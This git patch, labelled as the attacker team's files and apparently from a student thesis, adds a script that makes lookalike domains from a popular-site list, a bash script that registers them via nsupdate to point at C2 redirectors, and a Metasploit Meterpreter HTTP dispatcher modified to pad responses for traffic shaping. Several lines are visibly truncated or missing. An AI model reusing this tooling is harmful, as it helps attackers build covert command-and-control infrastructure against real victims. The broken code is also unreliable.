From 50f57a2773c198518da6457aba2ab19352eb6484 Mon Sep 17 00:00:00 2001
From: usuario <>
Date: Wed, 1 Jun 2022 17:11:44 +0200
Subject: [PATCH] Archivos del equipo atacante

 DGA/              |  54 +++
 DGA/         |  27 ++
 DGA/top-200.csv                 | 200 ++++++++
 Metasploit/packet_dispatcher.rb | 809 ++++++++++++++++++++++++++++++++
 4 files changed, 1090 insertions(+)
 create mode 100644 DGA/
 create mode 100755 DGA/
 create mode 100644 DGA/top-200.csv
 create mode 100644 Metasploit/packet_dispatcher.rb

diff --git a/DGA/ b/DGA/
new file mode 100644
index 0000000..924acb6
--- /dev/null
+++ b/DGA/
@@ -0,0 +1,54 @@
+import random
+from datetime import date
+import string
+NUM_REDIRECTORS = 4	# change for each experiment	
+fileIn = open('/home/usuario/Escritorio/payloads/charbot/top-200.csv', 'r')
+names = fileIn.readlines()
+valid_names = []
+for name in names:
+	#remove numbers and domain
+	valid_names.append(name.strip().split(",")[1].split(".")[0])
+#remove duplicate
+valid_names = [i for n, i in enumerate(valid_names) if i not in valid_names[:n]]
+#generate date seed
+#choose random domain names
+random_indices = random.sample(range(0,len(valid_names)), NUM_REDIRECTORS)
+valid_names_random = []
+for j in range(NUM_REDIRECTORS):
+	valid_names_random.append(valid_names[random_indices[j]])
+changed_names_random = []
+for n in range(NUM_REDIRECTORS):
+	if len(valid_names[random_indices[n]]) > 1:
+		#generate 2 random position to change
+		change_characters = random.sample(range(0,len(valid_names[random_indices[n]])), 2)
+		temp = list(valid_names_random[n]) 
+		#change 2 characters
+		temp[change_characters[0]] = random.choices(string.ascii_lowercase)[0]
+		temp[change_characters[1]] = random.choices(string.ascii_lowercase)[0]
+		changed_names_random.append(''.join(temp))
+		#add TFG domain
+		changed_names_random[n] = changed_names_random[n] + ""
+	else:
+		temp = random.choices(string.ascii_lowercase)[0]
+		changed_names_random.append(''.join(temp))
+		changed_names_random[n] = changed_names_random[n] + ""
+print (changed_names_random)
diff --git a/DGA/ b/DGA/
new file mode 100755
index 0000000..f747692
--- /dev/null
+++ b/DGA/
@@ -0,0 +1,27 @@
+names=$(python3 /home/usuario/Escritorio/payloads/charbot/
+read -ra ADDR <<< "$names"
+for i in "${ADDR[@]}"; do   # access each element of array
+     if [ ${#i} -gt 2 ]; then
+        echo "$i"
+	echo "${redirectors[cont]}"
+  	touch nsupdate.txt
+	echo "server" > nsupdate.txt
+	echo "update add $i 86400 A ${redirectors[cont]}" >> nsupdate.txt
+	echo "send" >> nsupdate.txt
+        nsupdate nsupdate.txt
+        let cont=$cont+1
+    fi
+rm nsupdate.txt
diff --git a/DGA/top-200.csv b/DGA/top-200.csv
new file mode 100644
index 0000000..d698a1b
--- /dev/null
+++ b/DGA/top-200.csv
@@ -0,0 +1,200 @@
diff --git a/Metasploit/packet_dispatcher.rb b/Metasploit/packet_dispatcher.rb
new file mode 100644
index 0000000..9b7df04
--- /dev/null
+++ b/Metasploit/packet_dispatcher.rb
@@ -0,0 +1,809 @@
+# -*- coding: binary -*-
+require 'rex/post/meterpreter/command_mapper'
+require 'rex/post/meterpreter/packet_response_waiter'
+require 'rex/exceptions'
+require 'pathname'
+module Rex
+module Post
+module Meterpreter
+# Exception thrown when a request fails.
+class RequestError < ArgumentError
+  def initialize(command_id, einfo, ecode=nil)
+    command_name = Rex::Post::Meterpreter::CommandMapper.get_command_name(command_id)
+    @method = command_name || "##{command_id}"
+    @result = einfo
+    @code   = ecode || einfo
+  end
+  def to_s
+    "#{@method}: Operation failed: #{@result}"
+  end
+  # The method that failed.
+  attr_reader :method
+  # The error result that occurred, typically a windows error message.
+  attr_reader :result
+  # The error result that occurred, typically a windows error code.
+  attr_reader :code
+# Handles packet transmission, reception, and correlation,
+# and processing
+module PacketDispatcher
+  # Defualt time, in seconds, to wait for a response after sending a packet
+  # Number of seconds to wait without getting any packets before we try to
+  # send a liveness check. A minute should be generous even on the highest
+  # latency networks
+  #
+  # @see #keepalive
+  PING_TIME = 60
+  # This mutex is used to lock out new commands during an
+  # active migration. Unused if this is a passive dispatcher
+  attr_accessor :comm_mutex
+  # The guid that identifies an active Meterpreter session
+  attr_accessor :session_guid
+  # This contains the key material used for TLV encryption
+  attr_accessor :tlv_enc_key
+  # Passive Dispatching
+  #
+  # @return [Rex::ServiceManager]
+  # @return [nil] if this is not a passive dispatcher
+  attr_accessor :passive_service
+  # @return [Array]
+  attr_accessor :send_queue
+  # @return [Array]
+  attr_accessor :recv_queue
+  def initialize_passive_dispatcher
+    self.send_queue   = []
+    self.recv_queue   = []
+    self.waiters      = []
+    self.alive        = true
+  end
+  def shutdown_passive_dispatcher
+    self.alive      = false
+    self.send_queue = []
+    self.recv_queue = []
+    self.waiters    = []
+  end
+  def on_passive_request(cli, req)
+    begin
+      self.last_checkin =
+      resp = send_queue.shift
+      cli.send_response(resp)
+    rescue => e
+      send_queue.unshift(resp) if resp
+      elog("Exception sending a reply to the reader request #{cli.inspect}", error: e)
+    end
+  end
+  ##
+  #
+  # Transmission
+  #
+  ##
+  #
+  # Sends a packet without waiting for a response.
+  #
+  def send_packet(packet, opts={})
+    if self.pivot_session
+      opts[:session_guid] = self.session_guid
+      opts[:tlv_enc_key] = self.tlv_enc_key
+      return self.pivot_session.send_packet(packet, opts)
+    end
+    if opts[:completion_routine]
+      add_response_waiter(packet, opts[:completion_routine], opts[:completion_param])
+    end
+    session_guid = self.session_guid
+    tlv_enc_key = self.tlv_enc_key
+    # if a session guid is provided, use all the details provided
+    if opts[:session_guid]
+      session_guid = opts[:session_guid]
+      tlv_enc_key = opts[:tlv_enc_key]
+    end
+    log_packet(packet, :send)
+    bytes = 0
+    raw   = packet.to_r(session_guid, tlv_enc_key)
+    err   = nil
+    # Short-circuit send when using a passive dispatcher
+    if self.passive_service
+      send_queue.push(raw)
+      return raw.size # Lie!
+    end
+    if raw
+      self.comm_mutex.synchronize do
+        begin
+          bytes = self.sock.write(raw)
+        rescue ::Exception => e
+          err = e
+        end
+      end
+      if bytes.to_i == 0
+        # Mark the session itself as dead
+        self.alive = false
+        # Reraise the error to the top-level caller
+        raise err if err
+      end
+    end
+    return bytes
+  end
+  #
+  # Sends a packet and waits for a timeout for the given time interval.
+  #
+  # @param packet [Packet] request to send
+  # @param timeout [Integer,nil] seconds to wait for response, or nil to ignore the
+  #   response and return immediately
+  # @return (see #send_packet_wait_response)
+  def send_request(packet, timeout = self.response_timeout)
+    response = send_packet_wait_response(packet, timeout)
+    if timeout.nil?
+      return nil
+    elsif response.nil?
+      raise"Send timed out")
+    elsif (response.result != 0)
+      einfo = lookup_error(response.result)
+      e =, einfo, response.result)
+      e.set_backtrace(caller)
+      raise e
+    end
+    return response
+  end
+  #
+  # Transmits a packet and waits for a response.
+  #
+  # @param packet [Packet] the request packet to send
+  # @param timeout [Integer,nil] number of seconds to wait, or nil to wait
+  #   forever
+  def send_packet_wait_response(packet, timeout)
+    if packet.type == PACKET_TYPE_REQUEST && commands.present?
+      # XXX: Remove this condition once the payloads gem has had another major version bump from 2.x to 3.x and
+      # rapid7/metasploit-payloads#451 has been landed to correct the `enumextcmd` behavior on Windows. Until then, skip
+      # proactive validation of Windows core commands. This is not the only instance of this workaround.
+      windows_core = base_platform == 'windows' && (packet.method - (packet.method % COMMAND_ID_RANGE)) == Rex::Post::Meterpreter::ClientCore.extension_id
+      unless windows_core || commands.include?(packet.method)
+        if (ext_name = Rex::Post::Meterpreter::ExtensionMapper.get_extension_name(packet.method))
+          unless ext.aliases.include?(ext_name)
+            raise, "The command requires the #{ext_name} extension to be loaded")
+          end
+        end
+        raise, "The command is not supported by this Meterpreter type (#{session_type})")
+      end
+    end
+    # First, add the waiter association for the supplied packet
+    waiter = add_response_waiter(packet)
+    bytes_written = send_packet(packet)
+    # Transmit the packet
+    if (bytes_written.to_i <= 0)
+      # Remove the waiter if we failed to send the packet.
+      remove_response_waiter(waiter)
+      return nil
+    end
+    if not timeout
+      return nil
+    end
+    # Wait for the supplied time interval
+    response = waiter.wait(timeout)
+    # Remove the waiter from the list of waiters in case it wasn't
+    # removed. This happens if the waiter timed out above.
+    remove_response_waiter(waiter)
+    # wire in the UUID for this, as it should be part of every response
+    # packet
+    if response && !self.payload_uuid
+      uuid = response.get_tlv_value(TLV_TYPE_UUID)
+      self.payload_uuid ={:raw => uuid}) if uuid
+    end
+    # Return the response packet, if any
+    return response
+  end
+  # Send a ping to the server.
+  #
+  # Our 'ping' is a check for eof on channel id 0. This method has no side
+  # effects and always returns an answer (regardless of the existence of chan
+  # 0), which is all that's needed for a liveness check. The answer itself is
+  # unimportant and is ignored.
+  #
+  # @return [void]
+  def keepalive
+    if @ping_sent
+      if - last_checkin.to_i > PING_TIME*2
+        dlog("No response to ping, session #{self.sid} is dead", LEV_3)
+        self.alive = false
+      end
+    else
+      pkt = Packet.create_request(COMMAND_ID_CORE_CHANNEL_EOF)
+      pkt.add_tlv(TLV_TYPE_CHANNEL_ID, 0)
+      add_response_waiter(pkt, { @ping_sent = false })
+      send_packet(pkt)
+      @ping_sent = true
+    end
+  end
+  ##
+  #
+  # Reception
+  #
+  ##
+  def pivot_keepalive_start
+    return unless self.send_keepalives
+    self.receiver_thread = Rex::ThreadFactory.spawn("PivotKeepalive", false) do
+      while self.alive
+        begin
+          Rex::sleep(PING_TIME)
+          keepalive
+        rescue ::Exception => e
+          dlog("Exception caught in pivot keepalive: #{e.class}: #{e}", 'meterpreter', LEV_1)
+          dlog("Call stack: #{e.backtrace.join("\n")}", 'meterpreter', LEV_2)
+          self.alive = false
+          break
+        end
+      end
+    end
+  end
+  #
+  # Monitors the PacketDispatcher's sock for data in its own
+  # thread context and parsers all inbound packets.
+  #
+  def monitor_socket
+    # Skip if we are using a passive dispatcher
+    return if self.passive_service
+    # redirect to pivot keepalive if we're a pivot session
+    return pivot_keepalive_start if self.pivot_session
+    self.comm_mutex =
+    self.waiters = []
+    # This queue is where the new incoming packets end up
+    @new_packet_queue =
+    # This is where we put packets that aren't new, but haven't
+    # yet been handled.
+    @incomplete_queue =
+    @ping_sent = false
+    # Spawn a thread for receiving packets
+    self.receiver_thread = Rex::ThreadFactory.spawn("MeterpreterReceiver", false) do
+      while (self.alive)
+        begin
+          rv =[ self.sock.fd ], nil, nil, PING_TIME)
+          if rv
+            packet = receive_packet
+            # Always enqueue the new packets onto the new packet queue
+            @new_packet_queue << decrypt_inbound_packet(packet) if packet
+          elsif self.send_keepalives && @new_packet_queue.empty?
+            keepalive
+          end
+        rescue ::Exception => e
+          dlog("Exception caught in monitor_socket: #{e.class}: #{e}", 'meterpreter', LEV_1)
+          dlog("Call stack: #{e.backtrace.join("\n")}", 'meterpreter', LEV_2)
+          self.alive = false
+          break
+        end
+      end
+    end
+    # Spawn a new thread that monitors the socket
+    self.dispatcher_thread = Rex::ThreadFactory.spawn("MeterpreterDispatcher", false) do
+      begin
+      while (self.alive)
+        # This is where we'll store incomplete packets on
+        # THIS iteration
+        incomplete = []
+        # The backlog is the full list of packets that aims
+        # to be handled this iteration
+        backlog    = []
+        # If we have any left over packets from the previous
+        # iteration, we need to prioritise them over the new
+        # packets. If we don't do this, then we end up in
+        # situations where data on channels can be processed
+        # out of order. We don't do a blocking wait here via
+        # the .pop method because we don't want to block, we
+        # just want to dump the queue.
+        while @incomplete_queue.length > 0
+          backlog << @incomplete_queue.pop
+        end
+        # If the backlog is empty, we don't have old/stale
+        # packets hanging around, so perform a blocking wait
+        # for the next packet
+        backlog << @new_packet_queue.pop if backlog.length == 0
+        # At this point we either received a packet off the wire
+        # or we had a backlog to process. In either case, we
+        # perform a non-blocking queue dump to fill the backlog
+        # with every packet we have.
+        while @new_packet_queue.length > 0
+          backlog << @new_packet_queue.pop
+        end
+        #
+        # Prioritize message processing here
+        # 1. Close should always be processed at the end
+        # 2. Command responses always before channel data
+        #
+        tmp_command = []
+        tmp_channel = []
+        tmp_close   = []
+        backlog.each do |pkt|
+          if(pkt.response?)
+            tmp_command << pkt
+            next
+          end
+          if(pkt.method == COMMAND_ID_CORE_CHANNEL_CLOSE)
+            tmp_close << pkt
+            next
+          end
+          tmp_channel << pkt
+        end
+        backlog = []
+        backlog.push(*tmp_command)
+        backlog.push(*tmp_channel)
+        backlog.push(*tmp_close)
+        #
+        # Process the message queue
+        #
+        backlog.each do |pkt|
+          begin
+          unless dispatch_inbound_packet(pkt)
+            # Keep Packets in the receive queue until a handler is registered
+            # for them. Packets will live in the receive queue for up to
+            # PACKET_TIMEOUT seconds, after which they will be dropped.
+            #
+            # A common reason why there would not immediately be a handler for
+            # a received Packet is in channels, where a connection may
+            # open and receive data before anything has asked to read.
+            if ( - pkt.created_at.to_i < PACKET_TIMEOUT)
+              incomplete << pkt
+            end
+          end
+          rescue ::Exception => e
+            dlog("Dispatching exception with packet #{pkt}: #{e} #{e.backtrace}", 'meterpreter', LEV_1)
+          end
+        end
+        # If the backlog and incomplete arrays are the same, it means
+        # dispatch_inbound_packet wasn't able to handle any of the
+        # packets. When that's the case, we can get into a situation
+        # where @new_packet_queue is not empty and, since nothing else bounds this
+        # loop, we spin CPU trying to handle packets that can't be
+        # handled. Sleep here to treat that situation as though the
+        # queue is empty.
+        if (backlog.length > 0 && backlog.length == incomplete.length)
+, nil, nil, 0.10)
+        end
+        # If we have any packets that weren't handled, they go back
+        # on the incomplete queue so that they're prioritised over
+        # new packets that are coming in off the wire.
+        dlog("Requeuing #{incomplete.length} packet(s)", 'meterpreter', LEV_1) if incomplete.length > 0
+        while incomplete.length > 0
+          @incomplete_queue << incomplete.shift
+        end
+        # If the old queue of packets gets too big...
+        if(@incomplete_queue.length > 100)
+          removed = []
+          # Drop a bunch of them.
+          (1..25).each {
+            removed << @incomplete_queue.pop
+          }
+          dlog("Backlog has grown to over 100 in monitor_socket, dropping older packets: #{{|x| x.inspect}.join(" - ")}", 'meterpreter', LEV_1)
+        end
+      end
+      rescue ::Exception => e
+        dlog("Exception caught in monitor_socket dispatcher: #{e.class} #{e} #{e.backtrace}", 'meterpreter', LEV_1)
+      ensure
+        self.receiver_thread.kill if self.receiver_thread
+      end
+    end
+  end
+  #
+  # Parses data from the dispatcher's sock and returns a Packet context
+  # once a full packet has been received.
+  #
+  def receive_packet
+    packet = parser.recv(self.sock)
+    if packet
+      packet.parse_header!
+      if self.session_guid == NULL_GUID
+        self.session_guid = packet.session_guid.dup
+      end
+    end
+    packet
+  end
+  #
+  # Stop the monitor
+  #
+  def monitor_stop
+    if self.receiver_thread
+      self.receiver_thread.kill
+      self.receiver_thread.join
+      self.receiver_thread = nil
+    end
+    if self.dispatcher_thread
+      self.dispatcher_thread.kill
+      self.dispatcher_thread.join
+      self.dispatcher_thread = nil
+    end
+  end
+  ##
+  #
+  # Waiter registration
+  #
+  ##
+  #
+  # Adds a waiter association with the supplied request packet.
+  #
+  def add_response_waiter(request, completion_routine = nil, completion_param = nil)
+    if self.pivot_session
+      return self.pivot_session.add_response_waiter(request, completion_routine, completion_param)
+    end
+    waiter =, completion_routine, completion_param)
+    self.waiters << waiter
+    return waiter
+  end
+  #
+  # Notifies a whomever is waiting for a the supplied response,
+  # if anyone.
+  #
+  def notify_response_waiter(response)
+    if self.pivot_session
+      return self.pivot_session.notify_response_waiter(response)
+    end
+    handled = false
+    self.waiters.each() { |waiter|
+      if (waiter.waiting_for?(response))
+        waiter.notify(response)
+        remove_response_waiter(waiter)
+        handled = true
+        break
+      end
+    }
+    return handled
+  end
+  #
+  # Removes a waiter from the list of waiters.
+  #
+  def remove_response_waiter(waiter)
+    if self.pivot_session
+      self.pivot_session.remove_response_waiter(waiter)
+    else
+      self.waiters.delete(waiter)
+    end
+  end
+  ##
+  #
+  # Dispatching
+  #
+  ##
+  #
+  # Initializes the inbound handlers.
+  #
+  def initialize_inbound_handlers
+    @inbound_handlers = []
+  end
+  #
+  # Decrypt the given packet with the appropriate key depending on
+  # if this session is a pivot session or not.
+  #
+  def decrypt_inbound_packet(packet)
+    pivot_session = self.find_pivot_session(packet.session_guid)
+    tlv_enc_key = self.tlv_enc_key
+    tlv_enc_key = pivot_session.pivoted_session.tlv_enc_key if pivot_session
+    packet.from_r(tlv_enc_key)
+    packet
+  end
+  #
+  # Dispatches and processes an inbound packet.  If the packet is a
+  # response that has an associated waiter, the waiter is notified.
+  # Otherwise, the packet is passed onto any registered dispatch
+  # handlers until one returns success.
+  #
+  def dispatch_inbound_packet(packet)
+    handled = false
+    log_packet(packet, :recv)
+    # Update our last reply time
+    self.last_checkin =
+    pivot_session = self.find_pivot_session(packet.session_guid)
+    pivot_session.pivoted_session.last_checkin = self.last_checkin if pivot_session
+    # If the packet is a response, try to notify any potential
+    # waiters
+    if packet.response? && notify_response_waiter(packet)
+      return true
+    end
+    # Enumerate all of the inbound packet handlers until one handles
+    # the packet
+    @inbound_handlers.each { |handler|
+      handled = nil
+      begin
+        if packet.response?
+          handled = handler.response_handler(self, packet)
+        else
+          handled = handler.request_handler(self, packet)
+        end
+      rescue ::Exception => e
+        dlog("Exception caught in dispatch_inbound_packet: handler=#{handler} #{e.class} #{e} #{e.backtrace}", 'meterpreter', LEV_1)
+        return true
+      end
+      if (handled)
+        break
+      end
+    }
+    return handled
+  end
+  #
+  # Registers an inbound packet handler that implements the
+  # InboundPacketHandler interface.
+  #
+  def register_inbound_handler(handler)
+    @inbound_handlers << handler
+  end
+  #
+  # Deregisters a previously registered inbound packet handler.
+  #
+  def deregister_inbound_handler(handler)
+    @inbound_handlers.delete(handler)
+  end
+  def initialize_tlv_logging(opt)
+    self.tlv_logging_error_occured = false
+    self.tlv_log_file = nil
+    self.tlv_log_file_path = nil
+    self.tlv_log_output = :none
+    if opt.casecmp?('console') || opt.casecmp?('true')
+      self.tlv_log_output = :console
+    elsif opt.start_with?('file:')
+      self.tlv_log_output = :file
+      self.tlv_log_file_path = opt.split('file:').last
+    end
+  end
+  attr_accessor :receiver_thread # :nodoc:
+  attr_accessor :dispatcher_thread # :nodoc:
+  attr_accessor :waiters # :nodoc:
+  attr_accessor :tlv_log_output # :nodoc:
+  attr_accessor :tlv_log_file # :nodoc:
+  attr_accessor :tlv_log_file_path # :nodoc:
+  attr_accessor :tlv_logging_error_occured # :nodoc:
+  def shutdown_tlv_logging
+    self.tlv_log_output = :none
+    self.tlv_log_file.close unless self.tlv_log_file.nil?
+    self.tlv_log_file = nil
+    self.tlv_log_file_path = nil
+  end
+  def log_packet(packet, packet_type)
+    # if we previously failed to log, return
+    return if self.tlv_logging_error_occured || self.tlv_log_output == :none
+    if self.tlv_log_output == :console
+      log_packet_to_console(packet, packet_type)
+    elsif self.tlv_log_output == :file
+      log_packet_to_file(packet, packet_type)
+    end
+  end
+  def log_packet_to_console(packet, packet_type)
+    if packet_type == :send
+      print "\n%redSEND%clr: #{packet.inspect}\n"
+    elsif packet_type == :recv
+      print "\n%bluRECV%clr: #{packet.inspect}\n"
+    end
+  end
+  def log_packet_to_file(packet, packet_type)
+    pathname ='file:').last)
+    begin
+      if self.tlv_log_file.nil? || self.tlv_log_file.path != pathname.to_s
+        self.tlv_log_file.close unless self.tlv_log_file.nil?
+        self.tlv_log_file =, 'a+')
+      end
+      if packet_type == :recv
+        self.tlv_log_file.puts("\nRECV: #{packet.inspect}\n")
+      elsif packet_type == :send
+        self.tlv_log_file.puts("\nSEND: #{packet.inspect}\n")
+      end
+    rescue ::StandardError => e
+      self.tlv_logging_error_occured = true
+      print_error "Failed writing to TLV Log File: #{pathname} with error: #{e.message}. Turning off logging for this session: #{self.inspect}..."
+      elog(e)
+      shutdown_tlv_logging
+      return
+    end
+  end
+module HttpPacketDispatcher
+  def initialize_passive_dispatcher
+    super
+    # Ensure that there is only one leading and trailing slash on the URI
+    resource_uri = "/" + self.conn_id.to_s.gsub(/(^\/|\/$)/, '') + "/"
+    self.passive_service = self.passive_dispatcher
+    self.passive_service.remove_resource(resource_uri)
+    self.passive_service.add_resource(resource_uri,
+      'Proc'             => { |cli, req| on_passive_request(cli, req) },
+      'VirtualDirectory' => true
+    )
+    # Add a reference count to the handler
+    self.passive_service.ref
+  end
+  def shutdown_passive_dispatcher
+    if self.passive_service
+      # Ensure that there is only one leading and trailing slash on the URI
+      resource_uri = "/" + self.conn_id.to_s.gsub(/(^\/|\/$)/, '') + "/"
+      self.passive_service.remove_resource(resource_uri) if self.passive_service
+      self.passive_service.deref
+      self.passive_service = nil
+    end
+    super
+  end
+  def on_passive_request(cli, req)
+    begin
+    resp =, "OK")
+    resp['Content-Type'] = 'application/octet-stream'
+    resp['Connection']   = 'close'
+    self.last_checkin =
+    if req.method == 'GET'
+      rpkt = send_queue.shift
+     # ********************* TFG *************************
+      espacios = req['Variable'].length.to_s
+      added = ''
+      espacios_resp = 0
+      if espacios.to_i == 0
+        espacios_resp = 1000
+      end
+      if espacios.to_i == 50
+        espacios_resp = 100
+      end
+      if espacios.to_i == 130
+        espacios_resp = 500
+      end
+      if espacios.to_i == 70
+        espacios_resp = 2000
+      end
+      i=0
+      while i <= espacios_resp.to_i
+        added = added + ' '
+        i = i + 1
+      end
+      resp.body = rpkt || ''+added+''
+     # *************************************************** 
+     begin
+        cli.send_response(resp)
+      rescue ::Exception => e
+        send_queue.unshift(rpkt) if rpkt
+        elog("Exception sending a reply to the reader request #{cli.inspect}", error: e)
+      end
+    else
+      resp.body = ""
+      if req.body and req.body.length > 0
+        packet =
+        packet.add_raw(req.body)
+        packet.parse_header!
+        packet = decrypt_inbound_packet(packet)
+        dispatch_inbound_packet(packet)
+      end
+      cli.send_response(resp)
+    end
+    rescue ::Exception => e
+      elog("Exception handling request: #{cli.inspect} #{req.inspect}", error: e)
+    end
+  end
+end; end; end